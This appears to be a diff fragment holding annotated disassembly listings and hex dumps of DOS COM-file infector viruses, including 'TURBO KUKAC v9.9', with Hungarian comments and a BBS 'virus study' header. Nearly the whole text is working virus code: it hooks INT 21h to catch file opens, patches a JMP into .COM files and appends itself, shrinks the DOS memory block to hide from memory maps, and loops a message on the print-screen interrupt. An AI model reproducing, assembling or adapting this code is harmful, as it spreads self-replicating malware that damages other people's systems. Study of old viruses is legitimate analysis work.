||||
0EB0:0179 B8A501 MOV AX,01A5 ;£j INT 21h offset
|
||||
0EB0:017C 8BD0 MOV DX,AX
|
||||
0EB0:017E 8BC1 MOV AX,CX
|
||||
0EB0:0180 8ED8 MOV DS,AX
|
||||
0EB0:0182 B82125 MOV AX,2521
|
||||
0EB0:0185 CD21 INT 21 ;INT 21h ellop sa
|
||||
0EB0:0187 8B168602 MOV DX,[0286] ;JMP+op.
|
||||
0EB0:018B 8B0E8802 MOV CX,[0288] ;operandus
|
||||
0EB0:018F A18C02 MOV AX,[028C] ;eredeti prg.seg.
|
||||
0EB0:0192 8ED8 MOV DS,AX
|
||||
0EB0:0194 89160001 MOV [0100],DX ;eredeti JMP+op.
|
||||
0EB0:0198 890E0201 MOV [0102],CX ;visszarak sa
|
||||
0EB0:019C 8EC0 MOV ES,AX
|
||||
0EB0:019E 59 POP CX
|
||||
0EB0:019F 58 POP AX
|
||||
0EB0:01A0 2E CS:
|
||||
0EB0:01A1 FF2E8A02 JMP FAR [028A] ;ugr s az eredeti
|
||||
;programra
|
||||
|
||||
;£j INT 21h rutin
|
||||
0EB0:01A5 90 NOP
|
||||
0EB0:01A6 80FC3D CMP AH,3D ;file nyit s ?
|
||||
0EB0:01A9 7403 JZ 01AE ;igen
|
||||
0EB0:01AB E9C000 JMP 026E ;ugr s az eredeti
|
||||
;INT 21h-ra
|
||||
0EB0:01AE 1E PUSH DS
|
||||
0EB0:01AF 06 PUSH ES
|
||||
0EB0:01B0 50 PUSH AX
|
||||
0EB0:01B1 53 PUSH BX
|
||||
0EB0:01B2 51 PUSH CX
|
||||
0EB0:01B3 52 PUSH DX
|
||||
0EB0:01B4 57 PUSH DI
|
||||
0EB0:01B5 56 PUSH SI
|
||||
|
||||
;Ellen”rzi hogy COM file-e
|
||||
|
||||
0EB0:01B6 8BFA MOV DI,DX ;Filespec.
|
||||
0EB0:01B8 8CDE MOV SI,DS
|
||||
0EB0:01BA 8EC6 MOV ES,SI
|
||||
0EB0:01BC B000 MOV AL,00
|
||||
0EB0:01BE B93200 MOV CX,0032
|
||||
0EB0:01C1 FC CLD
|
||||
0EB0:01C2 F2 REPNZ
|
||||
0EB0:01C3 AE SCASB ;PATH lem sol sa
|
||||
0EB0:01C4 83EF03 SUB DI,+03
|
||||
0EB0:01C7 B84F4D MOV AX,4D4F ;'OM' AX-ba
|
||||
0EB0:01CA 26 ES:
|
||||
0EB0:01CB 3B05 CMP AX,[DI] ;'OM' ?
|
||||
0EB0:01CD 7403 JZ 01D2 ;igen
|
||||
0EB0:01CF E99400 JMP 0266 ;eredeti INT 21h-ra
|
||||
0EB0:01D2 B82E43 MOV AX,432E ;'.C' AX-be
|
||||
0EB0:01D5 26 ES:
|
||||
0EB0:01D6 3B45FE CMP AX,[DI-02] ;'.C' ?
|
||||
0EB0:01D9 7403 JZ 01DE ;biztos hogy COM file!
|
||||
0EB0:01DB E98800 JMP 0266 ;eredeti INT 21h-ra
|
||||
0EB0:01DE B43D MOV AH,3D ;file nyit sa
|
||||
0EB0:01E0 B002 MOV AL,02 ;¡r s/olvas s
|
||||
0EB0:01E2 E89000 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:01E5 7303 JNB 01EA ;ha nincs hiba
|
||||
0EB0:01E7 EB7D JMP 0266 ;eredeti INT 21h-ra
|
||||
|
||||
;File m‚ret ellen”rz‚s
|
||||
|
||||
0EB0:01E9 90 NOP
|
||||
0EB0:01EA 8BD8 MOV BX,AX ;kezel”
|
||||
0EB0:01EC B90000 MOV CX,0000
|
||||
0EB0:01EF BA0000 MOV DX,0000
|
||||
0EB0:01F2 B80242 MOV AX,4202 ;file v‚g‚re poz.
|
||||
0EB0:01F5 E87D00 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:01F8 3D00FE CMP AX,FE00
|
||||
0EB0:01FB 7369 JNB 0266 ;nagyobb INT 21h-ra
|
||||
|
||||
;Eredeti 4 byte beolvas sa (JMP+operandusa)
|
||||
|
||||
0EB0:01FD 2D0300 SUB AX,0003 ;JMP+op. hossza
|
||||
0EB0:0200 2E CS:
|
||||
0EB0:0201 A38102 MOV [0281],AX
|
||||
0EB0:0204 B80042 MOV AX,4200 ;file elej‚re poz.
|
||||
0EB0:0207 B90000 MOV CX,0000
|
||||
0EB0:020A BA0000 MOV DX,0000
|
||||
0EB0:020D E86500 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:0210 B43F MOV AH,3F ;olvas s
|
||||
0EB0:0212 B90400 MOV CX,0004 ;4 byte
|
||||
0EB0:0215 BA8602 MOV DX,0286 ;ide olvassa
|
||||
0EB0:0218 8CCF MOV DI,CS
|
||||
0EB0:021A 8EDF MOV DS,DI ;DS=CS
|
||||
0EB0:021C E85600 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:021F B005 MOV AL,05
|
||||
0EB0:0221 3A068902 CMP AL,[0289]
|
||||
0EB0:0225 743F JZ 0266
|
||||
|
||||
;Virusra mutat¢ JMP+op be¡r sa a programba
|
||||
|
||||
0EB0:0227 B80042 MOV AX,4200 ;file elej‚re poz.
|
||||
0EB0:022A B90000 MOV CX,0000
|
||||
0EB0:022D 8BD1 MOV DX,CX
|
||||
0EB0:022F E84300 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:0232 B0E9 MOV AL,E9 ;JMP k¢dja
|
||||
0EB0:0234 2E CS:
|
||||
0EB0:0235 A28002 MOV [0280],AL ;leteszi
|
||||
0EB0:0238 B005 MOV AL,05
|
||||
0EB0:023A 2E CS:
|
||||
0EB0:023B A28302 MOV [0283],AL
|
||||
0EB0:023E B90400 MOV CX,0004 ;4 byte
|
||||
0EB0:0241 BA8002 MOV DX,0280 ;JMP+op. kezdete
|
||||
0EB0:0244 0E PUSH CS
|
||||
0EB0:0245 1F POP DS
|
||||
0EB0:0246 B440 MOV AH,40 ;ki¡r s
|
||||
0EB0:0248 E82A00 CALL 0275 ;INT 21h hiv sa
|
||||
|
||||
;1C0h byte ki¡r sa FERT™Z<E284A2>S!
|
||||
|
||||
0EB0:024B B80242 MOV AX,4202 ;file v‚g‚re poz.
|
||||
0EB0:024E B90000 MOV CX,0000
|
||||
0EB0:0251 8BD1 MOV DX,CX
|
||||
0EB0:0253 E81F00 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:0256 BA0001 MOV DX,0100 ;0100h -t¢l
|
||||
0EB0:0259 B9C001 MOV CX,01C0 ;01c0h byte
|
||||
0EB0:025C B440 MOV AH,40 ;ki¡r sa
|
||||
0EB0:025E E81400 CALL 0275 ;INT 21h hiv sa
|
||||
|
||||
;Ffert”z”tt file z r sa
|
||||
|
||||
0EB0:0261 B43E MOV AH,3E
|
||||
0EB0:0263 E80F00 CALL 0275 ;INT 21h hiv sa
|
||||
0EB0:0266 5E POP SI
|
||||
0EB0:0267 5F POP DI
|
||||
0EB0:0268 5A POP DX
|
||||
0EB0:0269 59 POP CX
|
||||
0EB0:026A 5B POP BX
|
||||
0EB0:026B 58 POP AX
|
||||
0EB0:026C 07 POP ES
|
||||
0EB0:026D 1F POP DS
|
||||
0EB0:026E 90 NOP
|
||||
0EB0:026F 2E CS:
|
||||
0EB0:0270 FF2E7C02 JMP FAR [027C] ;ugr s az eredeti
|
||||
;INT 21h-ra
|
||||
0EB0:0274 CF IRET
|
||||
|
||||
;Eredeti INT 21h hiv sa
|
||||
0EB0:0275 9C PUSHF ;IRET miatt!
|
||||
0EB0:0276 2E CS:
|
||||
0EB0:0277 FF1E7C02 CALL FAR [027C] ;INT 21h hiv sa
|
||||
0EB0:027B C3 RET
|
||||
|
||||
0EB0:027C 16 PUSH SS
|
||||
0EB0:027D 130C ADC CX,[SI]
|
||||
0EB0:027F 02E9 ADD CH,CL
|
||||
0EB0:0281 1C00 SBB AL,00
|
||||
0EB0:0283 050101 ADD AX,0101
|
||||
0EB0:0286 EB12 JMP 029A
|
||||
0EB0:0288 90 NOP
|
||||
0EB0:0289 49 DEC CX
|
||||
0EB0:028A 0001 ADD [BX+DI],AL
|
||||
0EB0:028C DD0A ESC 29,[BP+SI][BP+SI]
|
||||
0EB0:028E 0A0D OR CL,[DI]
|
||||
0EB0:0290 9A6476206D CALL 6D20:7664
|
||||
0EB0:0295 69 DB 69
|
||||
0EB0:0296 6E DB 6E
|
||||
0EB0:0297 64 DB 64
|
||||
0EB0:0298 65 DB 65
|
||||
0EB0:0299 6E DB 6E
|
||||
0EB0:029A 206E61 AND [BP+61],CH
|
||||
0EB0:029D 67 DB 67
|
||||
0EB0:029E 7974 JNS 0314
|
||||
0EB0:02A0 7564 JNZ 0306
|
||||
0EB0:02A2 A073A3 MOV AL,[A373]
|
||||
0EB0:02A5 6E DB 6E
|
||||
0EB0:02A6 61 DB 61
|
||||
0EB0:02A7 6B DB 6B
|
||||
0EB0:02A8 2120 AND [BX+SI],SP
|
||||
0EB0:02AA 54 PUSH SP
|
||||
0EB0:02AB 7572 JNZ 031F
|
||||
0EB0:02AD 62 DB 62
|
||||
0EB0:02AE 6F DB 6F
|
||||
0EB0:02AF 204020 AND [BX+SI+20],AL
|
||||
0EB0:02B2 2E CS:
|
||||
0EB0:02B3 2E CS:
|
||||
0EB0:02B4 2E CS:
|
||||
0EB0:02B5 202E2E2E AND [2E2E],CH
|
||||
0EB0:02B9 201A AND [BP+SI],BL
|
||||
0EB0:02BB 0000 ADD [BX+SI],AL
|
||||
0EB0:02BD 0000 ADD [BX+SI],AL
|
||||
0EB0:02BF 005374 ADD [BP+DI+74],DL
|
||||
0EB0:02C2 20E8 AND AL,CH
|
||||
0EB0:02C4 4E DEC SI
|
||||
0EB0:02C5 01E9 ADD CX,BP
|
||||
0EB0:02C7 51 PUSH CX
|
||||
0EB0:02C8 FF2EC606 JMP FAR [06C6]
|
||||
0EB0:02CC 050006 ADD AX,0600
|
||||
0EB0:02CF 2E CS:
|
||||
0EB0:02D0 C70609001000 MOV WORD PTR [0009],0010
|
||||
0EB0:02D6 EB7B JMP 0353
|
||||
0EB0:02D8 90 NOP
|
||||
0EB0:02D9 2E CS:
|
||||
0EB0:02DA C70609000A00 MOV WORD PTR [0009],000A
|
||||
0EB0:02E0 EB71 JMP 0353
|
||||
0EB0:02E2 90 NOP
|
||||
0EB0:02E3 2E CS:
|
||||
0EB0:02E4 FE060600 INC BYTE PTR [0006]
|
||||
0EB0:02E8 56 PUSH SI
|
||||
0EB0:02E9 8BF3 MOV SI,BX
|
||||
0EB0:02EB 83C302 ADD BX,+02
|
||||
0EB0:02EE 3E DS:
|
||||
0EB0:02EF 8B7202 MOV SI,[BP+SI+02]
|
||||
0EB0:02F2 2E CS:
|
||||
0EB0:02F3 803E060000 CMP BYTE PTR [0006],00
|
||||
0EB0:02F8 750A JNZ 0304
|
||||
0EB0:02FA AC LODSB
|
||||
0EB0:02FB 3C00 CMP AL,00
|
||||
0EB0:02FD 743B JZ 033A
|
||||
0EB0:02FF E80F03 CALL 0611
|
||||
|
||||
|
||||
Megjegyz‚s:
|
||||
|
||||
Nincs k ros hat sa. Megold sa kit<EFBFBD>n”, hiszen m‚g egy system
|
||||
info lek‚r‚se eset‚n sem kkisebb a DOS lltal l tott mem¢-
|
||||
ria m‚ret, mint a fizikai RAM m‚ret!
|
||||
|
||||
DUMP
|
||||
|
||||
0EB0:0100 E8 00 00 90 5E 50 51 B8-21 35 CD 21 8C C0 3D 00 ....^PQ.!5.!..=.
|
||||
0EB0:0110 40 72 20 83 EE 03 BA 86-01 03 F2 8B 1C 8B 4C 02 @r ...........L.
|
||||
0EB0:0120 89 1E 00 01 89 0E 02 01-8C D8 8E C0 59 58 BB 00 ............YX..
|
||||
0EB0:0130 01 FF E3 A1 02 00 2D 00-08 8E C0 BF 00 01 83 EE ......-.........
|
||||
0EB0:0140 03 B9 00 02 F3 A4 8C 06-F2 00 B9 55 01 89 0E F0 ...........U....
|
||||
0EB0:0150 00 FF 2E F0 00 8C C1 8C-D8 26 A3 8C 02 B8 00 01 .........&......
|
||||
0EB0:0160 26 A3 8A 02 8C C0 8E D8-B8 21 35 CD 21 2E 89 1E &........!5.!...
|
||||
0EB0:0170 7C 02 8C C3 2E 89 1E 7E-02 B8 A5 01 8B D0 8B C1 |......~........
|
||||
0EB0:0180 8E D8 B8 21 25 CD 21 8B-16 86 02 8B 0E 88 02 A1 ...!%.!.........
|
||||
0EB0:0190 8C 02 8E D8 89 16 00 01-89 0E 02 01 8E C0 59 58 ..............YX
|
||||
0EB0:01A0 2E FF 2E 8A 02 90 80 FC-3D 74 03 E9 C0 00 1E 06 ........=t......
|
||||
0EB0:01B0 50 53 51 52 57 56 8B FA-8C DE 8E C6 B0 00 B9 32 PSQRWV.........2
|
||||
0EB0:01C0 00 FC F2 AE 83 EF 03 B8-4F 4D 26 3B 05 74 03 E9 ........OM&;.t..
|
||||
0EB0:01D0 94 00 B8 2E 43 26 3B 45-FE 74 03 E9 88 00 B4 3D ....C&;E.t.....=
|
||||
0EB0:01E0 B0 02 E8 90 00 73 03 EB-7D 90 8B D8 B9 00 00 BA .....s..}.......
|
||||
0EB0:01F0 00 00 B8 02 42 E8 7D 00-3D 00 FE 73 69 2D 03 00 ....B.}.=..si-..
|
||||
0EB0:0200 2E A3 81 02 B8 00 42 B9-00 00 BA 00 00 E8 65 00 ......B.......e.
|
||||
0EB0:0210 B4 3F B9 04 00 BA 86 02-8C CF 8E DF E8 56 00 B0 .?...........V..
|
||||
0EB0:0220 05 3A 06 89 02 74 3F B8-00 42 B9 00 00 8B D1 E8 .:...t?..B......
|
||||
0EB0:0230 43 00 B0 E9 2E A2 80 02-B0 05 2E A2 83 02 B9 04 C...............
|
||||
0EB0:0240 00 BA 80 02 0E 1F B4 40-E8 2A 00 B8 02 42 B9 00 .......@.*...B..
|
||||
0EB0:0250 00 8B D1 E8 1F 00 BA 00-01 B9 C0 01 B4 40 E8 14 .............@..
|
||||
0EB0:0260 00 B4 3E E8 0F 00 5E 5F-5A 59 5B 58 07 1F 90 2E ..>...^_ZY[X....
|
||||
0EB0:0270 FF 2E 7C 02 CF 9C 2E FF-1E 7C 02 C3 16 13 0C 02 ..|......|......
|
||||
0EB0:0280 E9 1C 00 05 01 01 EB 12-90 49 00 01 DD 0A 0A 0D .........I......
|
||||
0EB0:0290 9A 64 76 20 6D 69 6E 64-65 6E 20 6E 61 67 79 74 .dv minden nagyt
|
||||
0EB0:02A0 75 64 A0 73 A3 6E 61 6B-21 20 54 75 72 62 6F 20 ud.s.nak! Turbo
|
||||
0EB0:02B0 40 20 2E 2E 2E 20 2E 2E-2E 20 1A 00 00 00 00 00 @ ... ... ......
|
||||
0EB0:02C0 53 74 20 E8 4E 01 E9 51-FF 2E C6 06 05 00 06 2E St .N..Q........
|
||||
0EB0:02D0 C7 06 09 00 10 00 EB 7B-90 2E C7 06 09 00 0A 00 .......{........
|
||||
0EB0:02E0 EB 71 90 2E FE 06 06 00-56 8B F3 83 C3 02 3E 8B .q......V.....>.
|
||||
0EB0:02F0 72 02 2E 80 3E 06 00 00-75 0A AC 3C 00 74 3B E8 r...>...u..<.t;.
|
||||
0EB0:0300 0F .
|
||||
|
|
@ -0,0 +1,426 @@
|
|||
;****************************************************************************;
|
||||
; ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] For All Your H/P/A/V Files [=- ;
|
||||
; -=] SysOp: Peter Venkman [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; ;
|
||||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||||
; ;
|
||||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||||
; Is. Keep This Code in Responsible Hands! ;
|
||||
; ;
|
||||
;****************************************************************************;
|
||||
TURBO KUKAC v9.9 virus unassembled list:
|
||||
`90.07.21.
|
||||
|
||||
Magyar zat: K”v ri L szl˘
|
||||
Tel.: (41) 21-822 07-13:20 mh.
|
||||
21-033 18:00-
|
||||
|
||||
|
||||
|
||||
28F8:0100 E80000 CALL 0103 ;IP ‚rt‚ke az SI-be
|
||||
28F8:0103 90 NOP ;ez lesz a b zis offset
|
||||
28F8:0104 5E POP SI
|
||||
28F8:0105 50 PUSH AX
|
||||
28F8:0106 51 PUSH CX
|
||||
28F8:0107 B021 MOV AL,21
|
||||
28F8:0109 B435 MOV AH,35
|
||||
28F8:010B CD21 INT 21 ;INT 21h cˇm‚nek lek‚r-
|
||||
;dez‚se
|
||||
28F8:010D 8CC0 MOV AX,ES
|
||||
28F8:010F 3D0040 CMP AX,4000 ;a mem˘ri ban van ?
|
||||
28F8:0112 7224 JB 0138 ;nincs!
|
||||
28F8:0114 83EE03 SUB SI,+03 ;b zis offset -3
|
||||
;(3 byte hosszu a JMP
|
||||
;+ az operandusa!)
|
||||
28F8:0117 BAC102 MOV DX,02C1
|
||||
28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levon sa
|
||||
;(COM file saj toss ga!)
|
||||
28F8:011E 03F2 ADD SI,DX
|
||||
28F8:0120 8B1C MOV BX,[SI] ;JMP k˘dja + az operan-
|
||||
;dus fele
|
||||
28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte
|
||||
28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet
|
||||
28F8:0129 890E0201 MOV [0102],CX ;let rol sa
|
||||
28F8:012D 8CD8 MOV AX,DS
|
||||
28F8:012F 8EC0 MOV ES,AX ;ES=DS
|
||||
28F8:0131 59 POP CX
|
||||
28F8:0132 58 POP AX
|
||||
28F8:0133 BB0001 MOV BX,0100 ;ugr s offset-je
|
||||
28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM V<>GRE-
|
||||
;HAJTŹSA
|
||||
|
||||
;HA M<>G NINCS A MEM˘RIŹBAN
|
||||
28F8:0138 8CD8 MOV AX,DS ;saj t szegmense
|
||||
28F8:013A 48 DEC AX ;saj t seg-1= MCB. seg.
|
||||
28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense
|
||||
28F8:013D A10300 MOV AX,[0003] ;DOS lltal a programnak
|
||||
;foglalt mem˘riablokk
|
||||
;hossza
|
||||
28F8:0140 2D4100 SUB AX,0041 ;virus hossz t levonja
|
||||
;bel”le (41*16 byte)
|
||||
28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS
|
||||
; lltal l tott teljes
|
||||
;mem˘ria nagys ga a prg.
|
||||
;kil‚p‚se ut n (41*16
|
||||
;byte-tal) kevesebb lesz
|
||||
;Hasonl˘an csin lja ezt
|
||||
;a YANKEE DOODLE is, s
|
||||
;ezzel azt ‚ri el, hogy
|
||||
;semmilyen
|
||||
;System Storage Map
|
||||
;programmal nem mutat-
|
||||
;hat˘ ki a virus jele-
|
||||
;l‚te a mem˘ri ban!
|
||||
;A PCTOOLS system info
|
||||
;kimutatja, azaz csak
|
||||
;annyit l tni, hogy a
|
||||
;fizikai RAM m‚ret 640K
|
||||
;s a DOS lltal l tott
|
||||
;az 639k byte! Igy k”-
|
||||
;vetkeztetni lehet...
|
||||
28F8:0146 8CC8 MOV AX,CS
|
||||
28F8:0148 8ED8 MOV DS,AX ;DS=CS
|
||||
28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej‚-
|
||||
;nek a paragrafuscˇme
|
||||
28F8:014D 2D0008 SUB AX,0800
|
||||
28F8:0150 8EC0 MOV ES,AX ;virus Łj szegmense
|
||||
28F8:0152 BF0001 MOV DI,0100
|
||||
28F8:0155 83EE03 SUB SI,+03
|
||||
28F8:0158 B90002 MOV CX,0200 ;virus hossza
|
||||
28F8:015B F3 REPZ
|
||||
28F8:015C A4 MOVSB ;virus m sol sa az Łj
|
||||
;szegmensbe
|
||||
28F8:015D 8C06C702 MOV [02C7],ES ;Łj szegmens t rol sa
|
||||
28F8:0161 B96C01 MOV CX,016C ;bel‚p‚si pont
|
||||
28F8:0164 890EC502 MOV [02C5],CX ;t rol sa
|
||||
28F8:0168 FF2EC502 JMP FAR [02C5] ;ugr s az Łj szegmens
|
||||
;01c6 offset-‚re
|
||||
;UJ SZEGMENSBEN A BEL<45>P<EFBFBD>SI PONT
|
||||
28F8:016C 8CC1 MOV CX,ES
|
||||
28F8:016E 8CD8 MOV AX,DS ;ahonnan m solta mag t
|
||||
28F8:0170 26 ES:
|
||||
28F8:0171 A3CB02 MOV [02CB],AX ;R<>GI PRG. segment cˇm
|
||||
28F8:0174 B80001 MOV AX,0100
|
||||
28F8:0177 26 ES:
|
||||
28F8:0178 A3C902 MOV [02C9],AX ;0100h offset t rol sa
|
||||
28F8:017B 8CC0 MOV AX,ES
|
||||
28F8:017D 8ED8 MOV DS,AX
|
||||
28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY Łj
|
||||
;offset-je
|
||||
28F8:0182 B005 MOV AL,05
|
||||
28F8:0184 B425 MOV AH,25
|
||||
28F8:0186 CD21 INT 21 ;INT 05 ellop sa
|
||||
28F8:0188 B435 MOV AH,35
|
||||
28F8:018A B021 MOV AL,21
|
||||
28F8:018C CD21 INT 21 ;INT 21h cˇm lek‚rdez‚-
|
||||
;se
|
||||
28F8:018E 2E CS:
|
||||
28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (r‚gi)
|
||||
28F8:0193 8CC3 MOV BX,ES
|
||||
28F8:0195 2E CS:
|
||||
28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (r‚gi)
|
||||
28F8:019A B8D901 MOV AX,01D9 ;Łj INT 21h offset cˇm
|
||||
28F8:019D 8BD0 MOV DX,AX
|
||||
28F8:019F 8BC1 MOV AX,CX
|
||||
28F8:01A1 8ED8 MOV DS,AX
|
||||
28F8:01A3 B021 MOV AL,21
|
||||
28F8:01A5 B425 MOV AH,25
|
||||
28F8:01A7 CD21 INT 21 ;INT 21h ellop sa
|
||||
28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ
|
||||
28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!!
|
||||
28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!!
|
||||
28F8:01B4 8ED8 MOV DS,AX
|
||||
28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP k˘dja
|
||||
28F8:01BA 890E0201 MOV [0102],CX ;‚s operandusa
|
||||
28F8:01BE 8EC0 MOV ES,AX
|
||||
28F8:01C0 59 POP CX
|
||||
28F8:01C1 58 POP AX
|
||||
28F8:01C2 2E CS:
|
||||
28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA-
|
||||
;TŹSA!
|
||||
;Łj INT 05 - HARD COPY rutin
|
||||
28F8:01C7 90 NOP
|
||||
28F8:01C8 50 PUSH AX
|
||||
28F8:01C9 1E PUSH DS
|
||||
28F8:01CA 52 PUSH DX
|
||||
28F8:01CB 8CC8 MOV AX,CS
|
||||
28F8:01CD 8ED8 MOV DS,AX
|
||||
;V<>GTELEN CIKLUS!
|
||||
28F8:01CF BACE02 MOV DX,02CE ;sz”veg kezdete
|
||||
;Turbo Kukac v9.9
|
||||
28F8:01D2 B409 MOV AH,09 ;print string
|
||||
28F8:01D4 E8D900 CALL 02B0 ;r‚gi INT 21h hiv sa
|
||||
28F8:01D7 EBF6 JMP 01CF ;Łjra!
|
||||
|
||||
;Łj INT 21h rutin
|
||||
28F8:01D9 90 NOP
|
||||
28F8:01DA 80FC3D CMP AH,3D ;file nyit sa alfunkci˘?
|
||||
28F8:01DD 7403 JZ 01E2 ;igen
|
||||
28F8:01DF E9C700 JMP 02A9 ;nem ugr sa az eredeti
|
||||
;INT 21h-ra
|
||||
28F8:01E2 90 NOP
|
||||
28F8:01E3 1E PUSH DS
|
||||
28F8:01E4 06 PUSH ES
|
||||
28F8:01E5 50 PUSH AX
|
||||
28F8:01E6 53 PUSH BX
|
||||
28F8:01E7 51 PUSH CX
|
||||
28F8:01E8 52 PUSH DX
|
||||
28F8:01E9 57 PUSH DI
|
||||
28F8:01EA 56 PUSH SI
|
||||
|
||||
;File kiterjeszt‚s ellen”rz‚se
|
||||
|
||||
28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete
|
||||
28F8:01ED 8CDE MOV SI,DS
|
||||
28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH
|
||||
; tv‚tele!)
|
||||
28F8:01F1 B000 MOV AL,00 ;PATH lez r˘ nulla
|
||||
28F8:01F3 B93200 MOV CX,0032 ;file secifik ci˘ hossza
|
||||
28F8:01F6 FC CLD ;el”re
|
||||
28F8:01F7 F2 REPNZ
|
||||
28F8:01F8 AE SCASB ;PATH lez r˘ 0 byte ke-
|
||||
;res‚se
|
||||
28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszt‚s
|
||||
;kezdet+1 pozici˘ra mu-
|
||||
;tat
|
||||
28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be
|
||||
28F8:01FF 26 ES:
|
||||
28F8:0200 3B05 CMP AX,[DI] ; 'OM' a v‚ge ?
|
||||
28F8:0202 7403 JZ 0207 ;igen val szin<69>leg COM
|
||||
;file
|
||||
28F8:0204 E99A00 JMP 02A1 ;nem COM ugr s az erede-
|
||||
;ti INT 21h-ra
|
||||
28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be
|
||||
28F8:020A 26 ES:
|
||||
28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ?
|
||||
28F8:020E 7403 JZ 0213 ;biztos hogy COM file!
|
||||
28F8:0210 E98E00 JMP 02A1 ;nem COM ugr s az erede-
|
||||
;ti INT 21h-ra
|
||||
;File nyit sa
|
||||
|
||||
28F8:0213 B43D MOV AH,3D ;file nyit s
|
||||
28F8:0215 B002 MOV AL,02 ;ˇr s/olvas s
|
||||
28F8:0217 E89600 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:021A 7303 JNB 021F ;ha nincs hiba
|
||||
28F8:021C E98200 JMP 02A1 ;hiba eset‚n ugr s az
|
||||
;eredeti INT 21h-ra
|
||||
28F8:021F 8BD8 MOV BX,AX ;file kezel”
|
||||
|
||||
;File m‚ret ellen”rz‚s
|
||||
|
||||
28F8:0221 B90000 MOV CX,0000
|
||||
28F8:0224 BA0000 MOV DX,0000
|
||||
28F8:0227 B002 MOV AL,02 ;file v‚g‚re
|
||||
28F8:0229 B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:022B E88200 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:022E 3D00FE CMP AX,FE00
|
||||
28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file
|
||||
;65024 byte-n l
|
||||
28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza
|
||||
|
||||
;Fert”zend” file eredeti 4 byte j nak
|
||||
;beolvas sa
|
||||
|
||||
28F8:0236 2E CS:
|
||||
28F8:0237 A3BE02 MOV [02BE],AX ;let rolja
|
||||
28F8:023A B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:023C B000 MOV AL,00 ;file elej‚re
|
||||
28F8:023E B90000 MOV CX,0000
|
||||
28F8:0241 BA0000 MOV DX,0000
|
||||
28F8:0244 E86900 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0247 B43F MOV AH,3F ;olvas s file-b˘l
|
||||
28F8:0249 B90400 MOV CX,0004 ;4 byte
|
||||
28F8:024C BAC102 MOV DX,02C1 ;ide tegye
|
||||
28F8:024F 8CCF MOV DI,CS
|
||||
28F8:0251 8EDF MOV DS,DI ;DS=CS
|
||||
28F8:0253 E85A00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0256 B005 MOV AL,05
|
||||
28F8:0258 3A06C402 CMP AL,[02C4] ;utols˘ byte=5 ?
|
||||
28F8:025C 7443 JZ 02A1 ;igen, ugr s az eredeti
|
||||
;INT 21h -ra
|
||||
|
||||
;Fert”zend” file-ba a virusra
|
||||
;mutat˘ JMP+op. kiˇr sa (4 byte)
|
||||
|
||||
28F8:025E B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:0260 B000 MOV AL,00 ;file elej‚re
|
||||
28F8:0262 B90000 MOV CX,0000
|
||||
28F8:0265 8BD1 MOV DX,CX
|
||||
28F8:0267 E84600 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:026A B0E9 MOV AL,E9 ;JMP k˘dja
|
||||
28F8:026C 2E CS:
|
||||
28F8:026D A2BD02 MOV [02BD],AL ;let rolja
|
||||
28F8:0270 B005 MOV AL,05
|
||||
28F8:0272 2E CS:
|
||||
28F8:0273 A2C002 MOV [02C0],AL
|
||||
28F8:0276 B90400 MOV CX,0004 ;4 byte
|
||||
28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete
|
||||
28F8:027C 8CC8 MOV AX,CS
|
||||
28F8:027E 8ED8 MOV DS,AX
|
||||
28F8:0280 B440 MOV AH,40 ;kiˇr s file-ba
|
||||
28F8:0282 E82B00 CALL 02B0 ;INT 21h hiv sa
|
||||
|
||||
;Program megfert”z‚se 0200h byte kiˇr sa
|
||||
;azaz a virus m”g‚m sol sa
|
||||
|
||||
28F8:0285 B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:0287 B002 MOV AL,02 ;file v‚g‚re
|
||||
